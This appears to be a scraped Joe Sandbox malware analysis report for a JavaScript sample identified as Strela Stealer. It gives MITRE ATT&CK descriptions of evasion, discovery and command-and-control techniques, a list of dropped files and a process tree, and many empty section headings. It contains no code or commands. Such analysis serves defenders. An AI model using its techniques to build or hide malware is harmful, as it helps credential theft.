Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DOC117482996.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Strela Stealer

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\MAVOOTC

C:\Users\user\AppData\Local\Temp\RCOJOMG.dll

C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat

C:\Users\user\AppData\Local\Temp\UHTGEZZ.bat:Zone.Identifier

Static File Info

General

File Icon

Network Behavior

Statistics

Behavior

System Behavior

Analysis Process: wscript.exePID: 7020, Parent PID: 3324

General

File Activities

File Created

File Read

Analysis Process: cmd.exePID: 7112, Parent PID: 7020

General

File Activities

File Created

Windows Analysis Report
DOC117482996.js